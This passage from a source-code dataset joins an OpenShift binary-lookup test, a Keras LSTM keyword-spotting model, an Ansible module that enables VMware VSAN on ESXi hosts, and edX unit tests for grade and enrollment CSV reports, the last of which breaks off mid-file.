    @unittest.skipIf(six.PY2, 'py3 test only')
    @mock.patch('shutil.which')
    @mock.patch('os.environ.get')
    def test_binary_lookup_in_home_py3(self, mock_env_get, mock_shutil_which):
        ''' Testing binary lookup in ~/bin '''
        oc_bin = os.path.expanduser('~/bin/oc')

        mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
        mock_shutil_which.side_effect = lambda _f, path=None: oc_bin

        self.assertEqual(locate_oc_binary(), oc_bin)
| apache-2.0 |
google-research/google-research | kws_streaming/models/lstm.py | 1 | 3941 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""LSTM with Mel spectrum and fully connected layers."""
from kws_streaming.layers import lstm
from kws_streaming.layers import modes
from kws_streaming.layers import speech_features
from kws_streaming.layers import stream
from kws_streaming.layers.compat import tf
import kws_streaming.models.model_utils as utils
def model_parameters(parser_nn):
  """LSTM model parameters.

  Registers the LSTM-specific command line flags on the given parser.
  Several flags are comma-separated strings so that one value per LSTM
  layer can be supplied; they are split later with utils.parse.

  Args:
    parser_nn: argparse parser to add the flags to.
  """
  parser_nn.add_argument(
      '--lstm_units',
      type=str,
      default='500',
      help='Output space dimensionality of lstm layer ',
  )
  parser_nn.add_argument(
      '--return_sequences',
      type=str,
      default='0',
      help='Whether to return the last output in the output sequence,'
      'or the full sequence',
  )
  # NOTE: argparse applies type=int to the string default, yielding 1.
  parser_nn.add_argument(
      '--stateful',
      type=int,
      default='1',
      help='If True, the last state for each sample at index i'
      'in a batch will be used as initial state for the sample '
      'of index i in the following batch',
  )
  parser_nn.add_argument(
      '--num_proj',
      type=str,
      default='200',
      help='The output dimensionality for the projection matrices.',
  )
  parser_nn.add_argument(
      '--use_peepholes',
      type=int,
      default='1',
      help='True to enable diagonal/peephole connections',
  )
  parser_nn.add_argument(
      '--dropout1',
      type=float,
      default=0.3,
      help='Percentage of data dropped',
  )
  parser_nn.add_argument(
      '--units1',
      type=str,
      default='',
      help='Number of units in the last set of hidden layers',
  )
  parser_nn.add_argument(
      '--act1',
      type=str,
      default='',
      help='Activation function of the last set of hidden layers',
  )
def model(flags):
  """LSTM model.

  Similar model in papers:
  Convolutional Recurrent Neural Networks for Small-Footprint Keyword Spotting
  https://arxiv.org/pdf/1703.05390.pdf (with no conv layer)
  Model topology is similar with "Hello Edge: Keyword Spotting on
  Microcontrollers" https://arxiv.org/pdf/1711.07128.pdf

  Args:
    flags: data/model parameters

  Returns:
    Keras model for training
  """
  inputs = tf.keras.layers.Input(
      shape=modes.get_input_data_shape(flags, modes.Modes.TRAINING),
      batch_size=flags.batch_size)
  x = inputs

  if flags.preprocess == 'raw':
    # Self-contained model: the user feeds raw audio only, so convert
    # it into speech features inside the graph.
    feature_params = speech_features.SpeechFeatures.get_params(flags)
    x = speech_features.SpeechFeatures(feature_params)(x)

  # One LSTM layer per entry in the comma-separated flag values.
  layer_units = utils.parse(flags.lstm_units)
  layer_return_sequences = utils.parse(flags.return_sequences)
  layer_num_projs = utils.parse(flags.num_proj)
  for units, returns_seq, num_proj in zip(
      layer_units, layer_return_sequences, layer_num_projs):
    x = lstm.LSTM(
        units=units,
        return_sequences=returns_seq,
        stateful=flags.stateful,
        use_peepholes=flags.use_peepholes,
        num_proj=num_proj)(x)

  x = stream.Stream(cell=tf.keras.layers.Flatten())(x)
  x = tf.keras.layers.Dropout(rate=flags.dropout1)(x)

  # Optional fully connected head before the classifier.
  for units, activation in zip(
      utils.parse(flags.units1), utils.parse(flags.act1)):
    x = tf.keras.layers.Dense(units=units, activation=activation)(x)

  x = tf.keras.layers.Dense(units=flags.label_count)(x)
  if flags.return_softmax:
    x = tf.keras.layers.Activation('softmax')(x)
  return tf.keras.Model(inputs, x)
| apache-2.0 |
alikins/ansible | lib/ansible/modules/cloud/vmware/vmware_vsan_cluster.py | 47 | 3753 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2015, Russell Teague <rteague2 () csc.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vmware_vsan_cluster
short_description: Configure VSAN clustering on an ESXi host
description:
- This module can be used to configure VSAN clustering on an ESXi host
version_added: 2.0
author: "Russell Teague (@mtnbikenc)"
notes:
- Tested on vSphere 5.5
requirements:
- "python >= 2.6"
- PyVmomi
options:
cluster_uuid:
description:
- Desired cluster UUID
required: False
extends_documentation_fragment: vmware.documentation
'''
EXAMPLES = '''
# Example command from Ansible Playbook
- name: Configure VMware VSAN Cluster
hosts: deploy_node
gather_facts: False
tags:
- vsan
tasks:
- name: Configure VSAN on first host
vmware_vsan_cluster:
hostname: "{{ groups['esxi'][0] }}"
username: "{{ esxi_username }}"
password: "{{ site_password }}"
register: vsan_cluster
- name: Configure VSAN on remaining hosts
vmware_vsan_cluster:
hostname: "{{ item }}"
username: "{{ esxi_username }}"
password: "{{ site_password }}"
cluster_uuid: "{{ vsan_cluster.cluster_uuid }}"
with_items: "{{ groups['esxi'][1:] }}"
'''
# pyVmomi is an optional dependency; record its availability so main()
# can fail with a friendly message instead of an ImportError at load time.
try:
    from pyVmomi import vim, vmodl

    HAS_PYVMOMI = True
except ImportError:
    HAS_PYVMOMI = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vmware import (HAS_PYVMOMI, connect_to_api, get_all_objs, vmware_argument_spec,
wait_for_task)
def create_vsan_cluster(host_system, new_cluster_uuid):
    """
    Enable VSAN on the given ESXi host.

    Builds a vim.vsan.host.ConfigInfo with VSAN enabled and automatic storage
    claiming turned on; when *new_cluster_uuid* is given, the host is pointed
    at that existing VSAN cluster instead of forming a new one.

    Returns a (changed, result, cluster_uuid) tuple, where cluster_uuid is the
    UUID reported by the host after the update task completes.
    """
    vsan_system = host_system.configManager.vsanSystem

    config = vim.vsan.host.ConfigInfo()
    config.enabled = True

    # Joining an existing cluster is optional; without a UUID the host
    # bootstraps its own VSAN cluster.
    if new_cluster_uuid is not None:
        cluster_info = vim.vsan.host.ConfigInfo.ClusterInfo()
        cluster_info.uuid = new_cluster_uuid
        config.clusterInfo = cluster_info

    storage_info = vim.vsan.host.ConfigInfo.StorageInfo()
    storage_info.autoClaimStorage = True
    config.storageInfo = storage_info

    changed, result = wait_for_task(vsan_system.UpdateVsan_Task(config))

    # Re-query the host so callers get the authoritative cluster UUID.
    return changed, result, vsan_system.QueryHostStatus().uuid
def main():
    """
    Ansible module entry point.

    Connects to the ESXi host given in the standard vmware connection
    parameters, locates the (single) physical HostSystem, and enables VSAN on
    it, optionally joining the cluster identified by the ``cluster_uuid``
    module parameter. Exits via module.exit_json / module.fail_json.
    """
    argument_spec = vmware_argument_spec()
    argument_spec.update(dict(cluster_uuid=dict(required=False, type='str')))

    module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=False)

    if not HAS_PYVMOMI:
        module.fail_json(msg='pyvmomi is required for this module')

    new_cluster_uuid = module.params['cluster_uuid']

    try:
        content = connect_to_api(module, False)
        host = get_all_objs(content, [vim.HostSystem])
        if not host:
            module.fail_json(msg="Unable to locate Physical Host.")
        # get_all_objs returns a dict keyed by managed object. On Python 3
        # dict.keys() is a view and is not subscriptable, so materialize a
        # list before taking the first host (works on Python 2 as well).
        host_system = list(host.keys())[0]
        changed, result, cluster_uuid = create_vsan_cluster(host_system, new_cluster_uuid)
        module.exit_json(changed=changed, result=result, cluster_uuid=cluster_uuid)
    except vmodl.RuntimeFault as runtime_fault:
        module.fail_json(msg=runtime_fault.msg)
    except vmodl.MethodFault as method_fault:
        module.fail_json(msg=method_fault.msg)
    except Exception as e:
        module.fail_json(msg=str(e))


if __name__ == '__main__':
    main()
| gpl-3.0 |
knehez/edx-platform | lms/djangoapps/instructor_task/tests/test_tasks_helper.py | 13 | 57777 | # -*- coding: utf-8 -*-
"""
Unit tests for LMS instructor-initiated background tasks helper functions.
Tests that CSV grade report generation works with unicode emails.
"""
import ddt
from mock import Mock, patch
import tempfile
import unicodecsv
from django.core.urlresolvers import reverse
from django.test.utils import override_settings
from capa.tests.response_xml_factory import MultipleChoiceResponseXMLFactory
from certificates.models import CertificateStatuses
from certificates.tests.factories import GeneratedCertificateFactory, CertificateWhitelistFactory
from course_modes.models import CourseMode
from courseware.tests.factories import InstructorFactory
from instructor_task.tests.test_base import InstructorTaskCourseTestCase, TestReportMixin, InstructorTaskModuleTestCase
from openedx.core.djangoapps.course_groups.models import CourseUserGroupPartitionGroup
from openedx.core.djangoapps.course_groups.tests.helpers import CohortFactory
import openedx.core.djangoapps.user_api.course_tag.api as course_tag_api
from openedx.core.djangoapps.user_api.partition_schemes import RandomUserPartitionScheme
from shoppingcart.models import Order, PaidCourseRegistration, CourseRegistrationCode, Invoice, \
CourseRegistrationCodeInvoiceItem, InvoiceTransaction, Coupon
from student.tests.factories import UserFactory, CourseModeFactory
from student.models import CourseEnrollment, CourseEnrollmentAllowed, ManualEnrollmentAudit, ALLOWEDTOENROLL_TO_ENROLLED
from verify_student.tests.factories import SoftwareSecurePhotoVerificationFactory
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from xmodule.partitions.partitions import Group, UserPartition
from instructor_task.models import ReportStore
from instructor_task.tasks_helper import (
cohort_students_and_upload,
upload_grades_csv,
upload_problem_grade_report,
upload_students_csv,
upload_may_enroll_csv,
upload_enrollment_report,
upload_exec_summary_report,
generate_students_certificates,
)
from openedx.core.djangoapps.util.testing import ContentGroupTestCase, TestConditionalContent
@ddt.ddt
class TestInstructorGradeReport(TestReportMixin, InstructorTaskCourseTestCase):
    """
    Tests that CSV grade report generation works.

    Covers unicode handling in student emails, cohort names, and user
    partition groups, plus error reporting when grading fails.
    """
    def setUp(self):
        super(TestInstructorGradeReport, self).setUp()
        self.course = CourseFactory.create()

    @ddt.data([u'student@example.com', u'ni\xf1o@example.com'])
    def test_unicode_emails(self, emails):
        """
        Test that students with unicode characters in emails is handled.
        """
        for i, email in enumerate(emails):
            self.create_student('student{0}'.format(i), email)
        self.current_task = Mock()
        self.current_task.update_state = Mock()
        with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
            mock_current_task.return_value = self.current_task
            result = upload_grades_csv(None, None, self.course.id, None, 'graded')
        num_students = len(emails)
        self.assertDictContainsSubset({'attempted': num_students, 'succeeded': num_students, 'failed': 0}, result)

    @patch('instructor_task.tasks_helper._get_current_task')
    @patch('instructor_task.tasks_helper.iterate_grades_for')
    def test_grading_failure(self, mock_iterate_grades_for, _mock_current_task):
        """
        Test that any grading errors are properly reported in the
        progress dict and uploaded to the report store.
        """
        # mock an error response from `iterate_grades_for`
        mock_iterate_grades_for.return_value = [
            (self.create_student('username', 'student@example.com'), {}, 'Cannot grade student')
        ]
        result = upload_grades_csv(None, None, self.course.id, None, 'graded')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 0, 'failed': 1}, result)
        # Error reports are written with a 'grade_report_err' file name prefix.
        report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
        self.assertTrue(any('grade_report_err' in item[0] for item in report_store.links_for(self.course.id)))

    def _verify_cell_data_for_user(self, username, course_id, column_header, expected_cell_content):
        """
        Verify cell data in the grades CSV for a particular user.

        Runs the grade report for *course_id* and asserts that the row whose
        'username' column equals *username* has *expected_cell_content* under
        *column_header*.
        """
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_grades_csv(None, None, course_id, None, 'graded')
            self.assertDictContainsSubset({'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
            report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
            report_csv_filename = report_store.links_for(course_id)[0][0]
            with open(report_store.path_to(course_id, report_csv_filename)) as csv_file:
                for row in unicodecsv.DictReader(csv_file):
                    if row.get('username') == username:
                        self.assertEqual(row[column_header], expected_cell_content)

    def test_cohort_data_in_grading(self):
        """
        Test that cohort data is included in grades csv if cohort configuration is enabled for course.
        """
        cohort_groups = ['cohort 1', 'cohort 2']
        course = CourseFactory.create(cohort_config={'cohorted': True, 'auto_cohort': True,
                                                     'auto_cohort_groups': cohort_groups})
        user_1 = 'user_1'
        user_2 = 'user_2'
        CourseEnrollment.enroll(UserFactory.create(username=user_1), course.id)
        CourseEnrollment.enroll(UserFactory.create(username=user_2), course.id)
        # In auto cohorting a group will be assigned to a user only when user visits a problem
        # In grading calculation we only add a group in csv if group is already assigned to
        # user rather than creating a group automatically at runtime
        self._verify_cell_data_for_user(user_1, course.id, 'Cohort Name', '')
        self._verify_cell_data_for_user(user_2, course.id, 'Cohort Name', '')

    def test_unicode_cohort_data_in_grading(self):
        """
        Test that cohorts can contain unicode characters.
        """
        course = CourseFactory.create(cohort_config={'cohorted': True})
        # Create users and manually assign cohorts
        user1 = UserFactory.create(username='user1')
        user2 = UserFactory.create(username='user2')
        CourseEnrollment.enroll(user1, course.id)
        CourseEnrollment.enroll(user2, course.id)
        professor_x = u'ÞrÖfessÖr X'
        magneto = u'MàgnëtÖ'
        cohort1 = CohortFactory(course_id=course.id, name=professor_x)
        cohort2 = CohortFactory(course_id=course.id, name=magneto)
        cohort1.users.add(user1)
        cohort2.users.add(user2)
        self._verify_cell_data_for_user(user1.username, course.id, 'Cohort Name', professor_x)
        self._verify_cell_data_for_user(user2.username, course.id, 'Cohort Name', magneto)

    def test_unicode_user_partitions(self):
        """
        Test that user partition groups can contain unicode characters.
        """
        user_groups = [u'ÞrÖfessÖr X', u'MàgnëtÖ']
        user_partition = UserPartition(
            0,
            'x_man',
            'X Man',
            [
                Group(0, user_groups[0]),
                Group(1, user_groups[1])
            ]
        )
        # Create course with group configurations
        self.initialize_course(
            course_factory_kwargs={
                'user_partitions': [user_partition]
            }
        )
        _groups = [group.name for group in self.course.user_partitions[0].groups]
        self.assertEqual(_groups, user_groups)

    def test_cohort_scheme_partition(self):
        """
        Test that cohort-schemed user partitions are ignored in the
        grades export.
        """
        # Set up a course with 'cohort' and 'random' user partitions.
        cohort_scheme_partition = UserPartition(
            0,
            'Cohort-schemed Group Configuration',
            'Group Configuration based on Cohorts',
            [Group(0, 'Group A'), Group(1, 'Group B')],
            scheme_id='cohort'
        )
        experiment_group_a = Group(2, u'Expériment Group A')
        experiment_group_b = Group(3, u'Expériment Group B')
        experiment_partition = UserPartition(
            1,
            u'Content Expériment Configuration',
            u'Group Configuration for Content Expériments',
            [experiment_group_a, experiment_group_b],
            scheme_id='random'
        )
        course = CourseFactory.create(
            cohort_config={'cohorted': True},
            user_partitions=[cohort_scheme_partition, experiment_partition]
        )
        # Create user_a and user_b which are enrolled in the course
        # and assigned to experiment_group_a and experiment_group_b,
        # respectively.
        user_a = UserFactory.create(username='user_a')
        user_b = UserFactory.create(username='user_b')
        CourseEnrollment.enroll(user_a, course.id)
        CourseEnrollment.enroll(user_b, course.id)
        course_tag_api.set_course_tag(
            user_a,
            course.id,
            RandomUserPartitionScheme.key_for_partition(experiment_partition),
            experiment_group_a.id
        )
        course_tag_api.set_course_tag(
            user_b,
            course.id,
            RandomUserPartitionScheme.key_for_partition(experiment_partition),
            experiment_group_b.id
        )
        # Assign user_a to a group in the 'cohort'-schemed user
        # partition (by way of a cohort) to verify that the user
        # partition group does not show up in the "Experiment Group"
        # cell.
        cohort_a = CohortFactory.create(course_id=course.id, name=u'Cohørt A', users=[user_a])
        CourseUserGroupPartitionGroup(
            course_user_group=cohort_a,
            partition_id=cohort_scheme_partition.id,
            group_id=cohort_scheme_partition.groups[0].id
        ).save()
        # Verify that we see user_a and user_b in their respective
        # content experiment groups, and that we do not see any
        # content groups.
        experiment_group_message = u'Experiment Group ({content_experiment})'
        self._verify_cell_data_for_user(
            user_a.username,
            course.id,
            experiment_group_message.format(
                content_experiment=experiment_partition.name
            ),
            experiment_group_a.name
        )
        self._verify_cell_data_for_user(
            user_b.username,
            course.id,
            experiment_group_message.format(
                content_experiment=experiment_partition.name
            ),
            experiment_group_b.name
        )
        # Make sure cohort info is correct.
        cohort_name_header = 'Cohort Name'
        self._verify_cell_data_for_user(
            user_a.username,
            course.id,
            cohort_name_header,
            cohort_a.name
        )
        self._verify_cell_data_for_user(
            user_b.username,
            course.id,
            cohort_name_header,
            ''
        )

    @patch('instructor_task.tasks_helper._get_current_task')
    @patch('instructor_task.tasks_helper.iterate_grades_for')
    def test_unicode_in_csv_header(self, mock_iterate_grades_for, _mock_current_task):
        """
        Tests that CSV grade report works if unicode in headers.
        """
        # mock a response from `iterate_grades_for`
        mock_iterate_grades_for.return_value = [
            (
                self.create_student('username', 'student@example.com'),
                {'section_breakdown': [{'label': u'\u8282\u540e\u9898 01'}], 'percent': 0, 'grade': None},
                'Cannot grade student'
            )
        ]
        result = upload_grades_csv(None, None, self.course.id, None, 'graded')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
@ddt.ddt
@patch.dict('django.conf.settings.FEATURES', {'ENABLE_PAID_COURSE_REGISTRATION': True})
class TestInstructorDetailedEnrollmentReport(TestReportMixin, InstructorTaskCourseTestCase):
    """
    Tests that CSV detailed enrollment generation works.

    Exercises the 'Enrollment Source' and 'Payment Status' columns for the
    different purchase paths (credit card, manual enrollment, registration
    codes, invoiced codes).
    """
    def setUp(self):
        super(TestInstructorDetailedEnrollmentReport, self).setUp()
        self.course = CourseFactory.create()
        # create testing invoice 1
        self.instructor = InstructorFactory(course_key=self.course.id)
        self.sale_invoice_1 = Invoice.objects.create(
            total_amount=1234.32, company_name='Test1', company_contact_name='TestName',
            company_contact_email='Test@company.com',
            recipient_name='Testw', recipient_email='test1@test.com', customer_reference_number='2Fwe23S',
            internal_reference="A", course_id=self.course.id, is_valid=True
        )
        self.invoice_item = CourseRegistrationCodeInvoiceItem.objects.create(
            invoice=self.sale_invoice_1,
            qty=1,
            unit_price=1234.32,
            course_id=self.course.id
        )

    def test_success(self):
        # Smoke test: the enrollment report task completes for one student.
        self.create_student('student', 'student@example.com')
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)

    def test_student_paid_course_enrollment_report(self):
        """
        test to check the paid user enrollment csv report status
        and enrollment source.
        """
        student = UserFactory()
        student_cart = Order.get_cart_for_user(student)
        PaidCourseRegistration.add_to_order(student_cart, self.course.id)
        student_cart.purchase()
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
        self._verify_cell_data_in_csv(student.username, 'Enrollment Source', 'Credit Card - Individual')
        self._verify_cell_data_in_csv(student.username, 'Payment Status', 'purchased')

    def test_student_manually_enrolled_in_detailed_enrollment_source(self):
        """
        test to check the manually enrolled user enrollment report status
        and enrollment source.
        """
        student = UserFactory()
        enrollment = CourseEnrollment.enroll(student, self.course.id)
        ManualEnrollmentAudit.create_manual_enrollment_audit(
            self.instructor, student.email, ALLOWEDTOENROLL_TO_ENROLLED,
            'manually enrolling unenrolled user', enrollment
        )
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
        enrollment_source = u'manually enrolled by user_id {user_id}, enrollment state transition: {transition}'.format(
            user_id=self.instructor.id, transition=ALLOWEDTOENROLL_TO_ENROLLED)  # pylint: disable=no-member
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
        self._verify_cell_data_in_csv(student.username, 'Enrollment Source', enrollment_source)
        self._verify_cell_data_in_csv(student.username, 'Payment Status', 'TBD')

    def test_student_used_enrollment_code_for_course_enrollment(self):
        """
        test to check the user enrollment source and payment status in the
        enrollment detailed report
        """
        student = UserFactory()
        self.client.login(username=student.username, password='test')
        student_cart = Order.get_cart_for_user(student)
        paid_course_reg_item = PaidCourseRegistration.add_to_order(student_cart, self.course.id)
        # update the quantity of the cart item paid_course_reg_item
        resp = self.client.post(reverse('shoppingcart.views.update_user_cart'),
                                {'ItemId': paid_course_reg_item.id, 'qty': '4'})
        self.assertEqual(resp.status_code, 200)
        student_cart.purchase()
        course_reg_codes = CourseRegistrationCode.objects.filter(order=student_cart)
        redeem_url = reverse('register_code_redemption', args=[course_reg_codes[0].code])
        response = self.client.get(redeem_url)
        self.assertEquals(response.status_code, 200)
        # check button text
        self.assertTrue('Activate Course Enrollment' in response.content)
        response = self.client.post(redeem_url)
        self.assertEquals(response.status_code, 200)
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
        self._verify_cell_data_in_csv(student.username, 'Enrollment Source', 'Used Registration Code')
        self._verify_cell_data_in_csv(student.username, 'Payment Status', 'purchased')

    def test_student_used_invoice_unpaid_enrollment_code_for_course_enrollment(self):
        """
        test to check the user enrollment source and payment status in the
        enrollment detailed report
        """
        student = UserFactory()
        self.client.login(username=student.username, password='test')
        course_registration_code = CourseRegistrationCode(
            code='abcde',
            course_id=self.course.id.to_deprecated_string(),
            created_by=self.instructor,
            invoice=self.sale_invoice_1,
            invoice_item=self.invoice_item,
            mode_slug='honor'
        )
        course_registration_code.save()
        redeem_url = reverse('register_code_redemption', args=['abcde'])
        response = self.client.get(redeem_url)
        self.assertEquals(response.status_code, 200)
        # check button text
        self.assertTrue('Activate Course Enrollment' in response.content)
        response = self.client.post(redeem_url)
        self.assertEquals(response.status_code, 200)
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
        self._verify_cell_data_in_csv(student.username, 'Enrollment Source', 'Used Registration Code')
        # No completed InvoiceTransaction exists, so payment is outstanding.
        self._verify_cell_data_in_csv(student.username, 'Payment Status', 'Invoice Outstanding')

    def test_student_used_invoice_paid_enrollment_code_for_course_enrollment(self):
        """
        test to check the user enrollment source and payment status in the
        enrollment detailed report
        """
        student = UserFactory()
        self.client.login(username=student.username, password='test')
        invoice_transaction = InvoiceTransaction(
            invoice=self.sale_invoice_1,
            amount=self.sale_invoice_1.total_amount,
            status='completed',
            created_by=self.instructor,
            last_modified_by=self.instructor
        )
        invoice_transaction.save()
        course_registration_code = CourseRegistrationCode(
            code='abcde',
            course_id=self.course.id.to_deprecated_string(),
            created_by=self.instructor,
            invoice=self.sale_invoice_1,
            invoice_item=self.invoice_item,
            mode_slug='honor'
        )
        course_registration_code.save()
        redeem_url = reverse('register_code_redemption', args=['abcde'])
        response = self.client.get(redeem_url)
        self.assertEquals(response.status_code, 200)
        # check button text
        self.assertTrue('Activate Course Enrollment' in response.content)
        response = self.client.post(redeem_url)
        self.assertEquals(response.status_code, 200)
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_enrollment_report(None, None, self.course.id, task_input, 'generating_enrollment_report')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
        self._verify_cell_data_in_csv(student.username, 'Enrollment Source', 'Used Registration Code')
        self._verify_cell_data_in_csv(student.username, 'Payment Status', 'Invoice Paid')

    def _verify_cell_data_in_csv(self, username, column_header, expected_cell_content):
        """
        Verify that the last ReportStore CSV contains the expected content.
        """
        report_store = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
        report_csv_filename = report_store.links_for(self.course.id)[0][0]
        with open(report_store.path_to(self.course.id, report_csv_filename)) as csv_file:
            # Expand the dict reader generator so we don't lose its content
            for row in unicodecsv.DictReader(csv_file):
                if row.get('Username') == username:
                    self.assertEqual(row[column_header], expected_cell_content)
@ddt.ddt
class TestProblemGradeReport(TestReportMixin, InstructorTaskModuleTestCase):
    """
    Test that the problem CSV generation works.

    The report has a fixed header (id/email/username/final grade) plus one
    (Earned)/(Possible) column pair per graded problem.
    """
    def setUp(self):
        super(TestProblemGradeReport, self).setUp()
        self.initialize_course()
        # Add unicode data to CSV even though unicode usernames aren't
        # technically possible in openedx.
        self.student_1 = self.create_student(u'üser_1')
        self.student_2 = self.create_student(u'üser_2')
        self.csv_header_row = [u'Student ID', u'Email', u'Username', u'Final Grade']

    @patch('instructor_task.tasks_helper._get_current_task')
    def test_no_problems(self, _get_current_task):
        """
        Verify that we see no grade information for a course with no graded
        problems.
        """
        result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
        self.assertDictContainsSubset({'action_name': 'graded', 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        self.verify_rows_in_csv([
            dict(zip(
                self.csv_header_row,
                [unicode(self.student_1.id), self.student_1.email, self.student_1.username, '0.0']
            )),
            dict(zip(
                self.csv_header_row,
                [unicode(self.student_2.id), self.student_2.email, self.student_2.username, '0.0']
            ))
        ])

    @patch('instructor_task.tasks_helper._get_current_task')
    def test_single_problem(self, _get_current_task):
        # One graded problem; student_1 answers it, student_2 does not and
        # therefore shows N/A in the per-problem columns.
        vertical = ItemFactory.create(
            parent_location=self.problem_section.location,
            category='vertical',
            metadata={'graded': True},
            display_name='Problem Vertical'
        )
        self.define_option_problem(u'Pröblem1', parent=vertical)
        self.submit_student_answer(self.student_1.username, u'Pröblem1', ['Option 1'])
        result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
        self.assertDictContainsSubset({'action_name': 'graded', 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        problem_name = u'Homework 1: Problem - Pröblem1'
        header_row = self.csv_header_row + [problem_name + ' (Earned)', problem_name + ' (Possible)']
        self.verify_rows_in_csv([
            dict(zip(
                header_row,
                [
                    unicode(self.student_1.id),
                    self.student_1.email,
                    self.student_1.username,
                    '0.01', '1.0', '2.0']
            )),
            dict(zip(
                header_row,
                [
                    unicode(self.student_2.id),
                    self.student_2.email,
                    self.student_2.username,
                    '0.0', 'N/A', 'N/A'
                ]
            ))
        ])

    @patch('instructor_task.tasks_helper._get_current_task')
    @patch('instructor_task.tasks_helper.iterate_grades_for')
    @ddt.data(u'Cannöt grade student', '')
    def test_grading_failure(self, error_message, mock_iterate_grades_for, _mock_current_task):
        """
        Test that any grading errors are properly reported in the progress
        dict and uploaded to the report store.
        """
        # mock an error response from `iterate_grades_for`
        student = self.create_student(u'username', u'student@example.com')
        mock_iterate_grades_for.return_value = [
            (student, {}, error_message)
        ]
        result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 0, 'failed': 1}, result)
        report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
        self.assertTrue(any('grade_report_err' in item[0] for item in report_store.links_for(self.course.id)))
        # An empty error message falls back to "Unknown error" in the report.
        self.verify_rows_in_csv([
            {
                u'Student ID': unicode(student.id),
                u'Email': student.email,
                u'Username': student.username,
                u'error_msg': error_message if error_message else "Unknown error"
            }
        ])
class TestProblemReportSplitTestContent(TestReportMixin, TestConditionalContent, InstructorTaskModuleTestCase):
    """
    Test the problem report on a course that has split tests.
    """
    # OPTION_1 is graded as correct, OPTION_2 as incorrect.
    OPTION_1 = 'Option 1'
    OPTION_2 = 'Option 2'

    def setUp(self):
        super(TestProblemReportSplitTestContent, self).setUp()
        self.problem_a_url = u'pröblem_a_url'
        self.problem_b_url = u'pröblem_b_url'
        self.define_option_problem(self.problem_a_url, parent=self.vertical_a)
        self.define_option_problem(self.problem_b_url, parent=self.vertical_b)

    def test_problem_grade_report(self):
        """
        Test that we generate the correct grade report when dealing with A/B tests.

        In order to verify that the behavior of the grade report is correct, we submit answers for problems
        that the student won't have access to. A/B tests won't restrict access to the problems, but it should
        not show up in that student's course tree when generating the grade report, hence the N/A's in the grade report.
        """
        # student A will get 100%, student B will get 50% because
        # OPTION_1 is the correct option, and OPTION_2 is the
        # incorrect option
        self.submit_student_answer(self.student_a.username, self.problem_a_url, [self.OPTION_1, self.OPTION_1])
        self.submit_student_answer(self.student_a.username, self.problem_b_url, [self.OPTION_1, self.OPTION_1])
        self.submit_student_answer(self.student_b.username, self.problem_a_url, [self.OPTION_1, self.OPTION_2])
        self.submit_student_answer(self.student_b.username, self.problem_b_url, [self.OPTION_1, self.OPTION_2])
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
            self.assertDictContainsSubset(
                {'action_name': 'graded', 'attempted': 2, 'succeeded': 2, 'failed': 0}, result
            )
        problem_names = [u'Homework 1: Problem - pröblem_a_url', u'Homework 1: Problem - pröblem_b_url']
        header_row = [u'Student ID', u'Email', u'Username', u'Final Grade']
        for problem in problem_names:
            header_row += [problem + ' (Earned)', problem + ' (Possible)']
        self.verify_rows_in_csv([
            dict(zip(
                header_row,
                [
                    unicode(self.student_a.id),
                    self.student_a.email,
                    self.student_a.username,
                    u'1.0', u'2.0', u'2.0', u'N/A', u'N/A'
                ]
            )),
            dict(zip(
                header_row,
                [
                    unicode(self.student_b.id),
                    self.student_b.email,
